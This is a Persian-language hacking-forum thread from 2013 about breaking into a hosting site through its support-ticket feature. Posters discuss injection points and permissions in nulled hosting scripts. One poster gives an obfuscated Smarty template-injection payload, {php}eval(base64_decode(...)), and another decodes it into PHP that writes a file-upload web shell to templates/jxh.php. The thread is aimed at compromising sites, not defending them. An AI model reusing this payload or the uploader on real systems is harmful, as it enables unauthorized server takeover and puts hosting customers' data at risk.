اطلاعیه

**IR4N0nY** · 11-28-2013, 03:12 PM

RE: مشکل در قسمت ارسال تیکت

کل سایت رو با اکانتکس اسکن ببین کجا ساخته میشه
یا شاید اصلا اون سایت مشکل امنیتی رو نداشته باشه
میتونی کدی رو که میزنی اینجا قرار بدی؟!

**A3is** · 11-28-2013, 11:07 PM

RE: مشکل در قسمت ارسال تیکت

سلام.

معمولا قسمت تیکت یا ارتباط با ما یا نظرات و ... برای ذخیره اون فیلدها و متن ها از چند روش میشه استفاده کرد.
1- ذخیره در دیتابیس
2- ارسال به ایمیل
3- ذخیره در فایل

که دو روش اول معمولا ورودی چک میشود و اگر چک نشوند و بشود چیزی تزریق کرد به نتیجه مورد نظر ممکن است برسیم ولی روش سوم خیلی خیلی کم و نایاب است که اگر این چنین بود باید از نرم افزارها یا پلاگینهایی مثل tamper data یا live http headers استفاده کرد و در شرایط خوبی آدرس فایل آپلود شده را پیدا کرد که دوستانی متخصص توی این زمینه لطفا توضیح دهند.

ولی بازم اگر این چنین باشه ، باید نوع ذخیره اون فایل php یا Asp یا ... باشه تا بتونیم رانش کنیم.
کلا نظرات شخصی بود. حالا دوستان هم میان کمک میکنند. ارادتمند

**0x8F** · 11-29-2013, 02:02 PM

RE: مشکل در قسمت ارسال تیکت

سیستم های هاستینگ که از اسرکیپت نال شده استفاده بکنند میشود با این روش هکشون کرد
ولی نسخه های اصل هر روز ابدیت میشوند
۲- سیستم تیکت ( یه قسمت فیلترینگ داره که اومدن کد های شما رو فیلتر کردن )
۳- تنها قسمتی از اسکریپت که پرمیزن ۷۷۷ داره فایل تمپلیت بود که تو اموزش های امن سازی اونو بردن قبل دایرکتوری
پس کلا نفوذش رو بستن
ولی به تازگی تو نسخه جدیدش شما به لایسنس اسرکیپت دسترسی دارید
از همین طریق میشه جای لایسنس کد مخرب قرارداد ( من اطلاعات زیادی ندارم چون باگش هنوز پابلیک نشده)

**Mr.3ler0n** · 12-01-2013, 12:53 PM

RE: مشکل در قسمت ارسال تیکت

این کدش هستش:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php})

**IR4N0nY** · 12-01-2013, 01:33 PM

RE: مشکل در قسمت ارسال تیکت

کد:

$code =("
<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>");
$fo = fopen("templates/jxh.php","w");
fwrite($fo,$code);

خوب از کد هم مشخصه همون طور که گفتی یه آپلودر رو توی یه فایل به اسم jxh.php ذخیره میکنه و در شاخه templates قرار میده
اگر اینجا نبود دیگه همون طوری که دوستان توضیح دادن ممکنه دیگه آسیب پذیر نباشه سایت